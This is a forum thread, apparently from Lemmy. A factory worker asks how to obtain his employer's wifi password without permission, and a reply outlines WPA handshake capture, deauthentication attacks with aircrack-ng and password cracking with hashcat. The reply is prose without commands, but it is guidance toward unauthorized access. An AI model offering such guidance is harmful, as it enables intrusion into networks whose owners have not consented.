So I work at a factory. It’s decent work, pays the bills. But I burn through my monthly data in a week from browsing my phone on breaks. I know there’s company wifi all over the building, but it’s intended for the office drones, not the plebs like me on the factory floor.
Some of the guys I’ve worked with knew the password and could use the wifi, but everyone I asked refused to share the password with me. I guess the didn’t want to risk getting in trouble? 🤷♂️
Anyway, a while back I learned about these pwnagotchi things, and from what I’ve found it would be exactly what I need to sniff out the password myself. But is this right?
Could someone who knows more about this tell me if I’m on the right track or not? Would this work, or would something else do better?
For the record, I only browse lemmy and a little Facebook at work, I’m not looking to download a bunch of stuff or bring a laptop to game on or anything. Just want to poke around the internet without using all my monthly data.
Both attacks need to wait a while while sniffing traffic, because they want to capture auth frames.
In the case of WPA, the periodic auth frames aren’t enough to crack the password, so you need a full auth frame. Those full frames get sent when a device connects to the network, and you need to be listening at that same moment in order to catch it (which is why it takes a while). Tools like aircrack-ng can, additionally, do deauth attacks, which temporarily log a target device off the network. This prompts an immediate automatic log in again, that the user doesn’t even notice, but which sends the full auth frame with the PSK.
Once you have a PSK, you can crack it with john or hashcat (hashcat is faster, because of GPU acceleration). Strong passwords will be uncrackable, but you do have a chance with small or common passwords. With a relatively mid-low range PC, you can easily get millions of hashes per second, making large dictionaries (12B+ passwords) feasible. If you have an idea of what the password could be (name of the company with maybe a year at the end that will probably be within the last 10 years, for example), it’s trivial to check all possible combinations. Bruteforcing is also possible, but it will be limited to 8-9 characters in length (12-13 if only numerical) before becoming unfeasible.